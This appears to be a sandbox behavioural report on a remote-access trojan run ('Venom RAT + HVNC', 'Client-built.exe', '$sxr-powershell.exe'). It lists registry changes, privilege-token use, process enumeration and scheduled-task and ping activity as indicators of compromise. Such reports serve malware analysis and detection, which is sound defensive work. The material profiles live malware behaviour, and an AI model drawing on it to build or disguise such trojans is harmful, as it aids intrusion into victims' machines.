Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
6232	taskkill.exe

Modifies data under HKEY_USERS 29 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	lsass.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\4	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5FA96407-7E77-483C-AC93-691D05850DE8}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000900444648b4cd1118b70080036b11a030300000078000000	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2"	Venom RAT + HVNC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByDirection = "1"	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 03000000060000000500000001000000040000000200000000000000ffffffff	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 04000000010000000000000003000000060000000500000002000000ffffffff	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1"	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6"	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5FA96407-7E77-483C-AC93-691D05850DE8}\FFlags = "1"	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616257"	Venom RAT + HVNC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 03000000040000000600000005000000010000000200000000000000ffffffff	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0"	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48"	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\ComDlg	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4"	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 720031000000000096595c1e100056454e4f4d527e312e362d480000560009000400efbe9659531e96595d1e2e000000f63c02000000090000000000000000000000000000001b372e00560065006e006f006d005200410054002d00560035002e0036002d00480056004e00430000001c000000	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	Venom RAT + HVNC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Videos"	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202	Venom RAT + HVNC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Venom RAT + HVNC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\SniffedFolderType = "Downloads"	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByDirection = "1"	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{94D6DDCC-4A68-4175-A374-BD584A510B78}\IconSize = "16"	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\LogicalViewMode = "3"	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\MRUListEx = 0100000000000000ffffffff	Venom RAT + HVNC.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	Venom RAT + HVNC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "4"	Venom RAT + HVNC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0 = 5600310000000000895482323000506c7567696e7300400009000400efbe96595c1e96595c1e2e000000443d02000000070000000000000000000000000000000a6fce0050006c007500670069006e007300000016000000	Venom RAT + HVNC.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION	wmiprvse.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1592	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
9152	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
2324	msedge.exe
2324	msedge.exe
1584	msedge.exe
1584	msedge.exe
4968	identity_helper.exe
4968	identity_helper.exe
3884	msedge.exe
3884	msedge.exe
1132	ClientFix.bat.exe
1132	ClientFix.bat.exe
1132	ClientFix.bat.exe
1132	ClientFix.bat.exe
2752	dllhost.exe
2752	dllhost.exe
2752	dllhost.exe
2752	dllhost.exe
1132	ClientFix.bat.exe
1132	ClientFix.bat.exe
4424	$sxr-powershell.exe
4424	$sxr-powershell.exe
4424	$sxr-powershell.exe
4424	$sxr-powershell.exe
180	dllhost.exe
180	dllhost.exe
180	dllhost.exe
180	dllhost.exe
4424	$sxr-powershell.exe
4424	$sxr-powershell.exe
1608	$sxr-powershell.exe
1608	$sxr-powershell.exe
4824	$sxr-powershell.exe
4824	$sxr-powershell.exe
1608	$sxr-powershell.exe
4824	$sxr-powershell.exe
1608	$sxr-powershell.exe
1608	$sxr-powershell.exe
4824	$sxr-powershell.exe
4824	$sxr-powershell.exe
2644	$sxr-powershell.exe
2644	$sxr-powershell.exe
2644	$sxr-powershell.exe
3812	$sxr-powershell.exe
3812	$sxr-powershell.exe
3812	$sxr-powershell.exe
2644	$sxr-powershell.exe
2644	$sxr-powershell.exe
3812	$sxr-powershell.exe
3812	$sxr-powershell.exe
1936	$sxr-powershell.exe
1936	$sxr-powershell.exe
1936	$sxr-powershell.exe
3492	$sxr-powershell.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
3192	Venom RAT + HVNC.exe
2940	taskhostw.exe
3440	Explorer.EXE
3760	Venom RAT + HVNC.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs

pid	Process
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1808	Client-built.exe
Token: 33	2464	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2464	AUDIODG.EXE
Token: SeDebugPrivilege	5056	taskmgr.exe
Token: SeSystemProfilePrivilege	5056	taskmgr.exe
Token: SeCreateGlobalPrivilege	5056	taskmgr.exe
Token: 33	5056	taskmgr.exe
Token: SeIncBasePriorityPrivilege	5056	taskmgr.exe
Token: SeRestorePrivilege	2180	7zG.exe
Token: 35	2180	7zG.exe
Token: SeSecurityPrivilege	2180	7zG.exe
Token: SeSecurityPrivilege	2180	7zG.exe
Token: SeRestorePrivilege	4924	7zG.exe
Token: 35	4924	7zG.exe
Token: SeSecurityPrivilege	4924	7zG.exe
Token: SeSecurityPrivilege	4924	7zG.exe
Token: SeDebugPrivilege	3192	Venom RAT + HVNC.exe
Token: SeDebugPrivilege	1132	ClientFix.bat.exe
Token: SeDebugPrivilege	1132	ClientFix.bat.exe
Token: SeDebugPrivilege	2752	dllhost.exe
Token: SeDebugPrivilege	4424	$sxr-powershell.exe
Token: SeDebugPrivilege	4424	$sxr-powershell.exe
Token: SeDebugPrivilege	180	dllhost.exe
Token: SeDebugPrivilege	1608	$sxr-powershell.exe
Token: SeDebugPrivilege	4824	$sxr-powershell.exe
Token: SeDebugPrivilege	2644	$sxr-powershell.exe
Token: SeDebugPrivilege	3812	$sxr-powershell.exe
Token: SeDebugPrivilege	1936	$sxr-powershell.exe
Token: SeDebugPrivilege	3492	$sxr-powershell.exe
Token: SeDebugPrivilege	4256	$sxr-powershell.exe
Token: SeDebugPrivilege	5220	$sxr-powershell.exe
Token: SeDebugPrivilege	5308	$sxr-powershell.exe
Token: SeDebugPrivilege	5468	$sxr-powershell.exe
Token: SeDebugPrivilege	4424	$sxr-powershell.exe
Token: SeDebugPrivilege	5552	dllhost.exe
Token: SeDebugPrivilege	4424	$sxr-powershell.exe
Token: SeDebugPrivilege	5752	dllhost.exe
Token: SeDebugPrivilege	5468	$sxr-powershell.exe
Token: SeDebugPrivilege	5644	dllhost.exe
Token: SeDebugPrivilege	5220	$sxr-powershell.exe
Token: SeDebugPrivilege	3492	$sxr-powershell.exe
Token: SeDebugPrivilege	5892	dllhost.exe
Token: SeDebugPrivilege	5692	dllhost.exe
Token: SeDebugPrivilege	5308	$sxr-powershell.exe
Token: SeDebugPrivilege	1968	dllhost.exe
Token: SeDebugPrivilege	4824	$sxr-powershell.exe
Token: SeDebugPrivilege	2644	$sxr-powershell.exe
Token: SeDebugPrivilege	3544	dllhost.exe
Token: SeDebugPrivilege	3812	$sxr-powershell.exe
Token: SeDebugPrivilege	1936	$sxr-powershell.exe
Token: SeDebugPrivilege	5296	dllhost.exe
Token: SeDebugPrivilege	1608	$sxr-powershell.exe
Token: SeDebugPrivilege	4256	$sxr-powershell.exe
Token: SeDebugPrivilege	2060	dllhost.exe
Token: SeDebugPrivilege	5996	dllhost.exe
Token: SeDebugPrivilege	6060	dllhost.exe
Token: SeDebugPrivilege	5920	dllhost.exe
Token: SeDebugPrivilege	5184	$sxr-powershell.exe
Token: SeDebugPrivilege	5412	$sxr-powershell.exe
Token: SeDebugPrivilege	6032	$sxr-powershell.exe
Token: SeDebugPrivilege	712	$sxr-powershell.exe
Token: SeDebugPrivilege	2848	$sxr-powershell.exe
Token: SeDebugPrivilege	5128	$sxr-powershell.exe
Token: SeDebugPrivilege	5348	$sxr-powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1808	Client-built.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
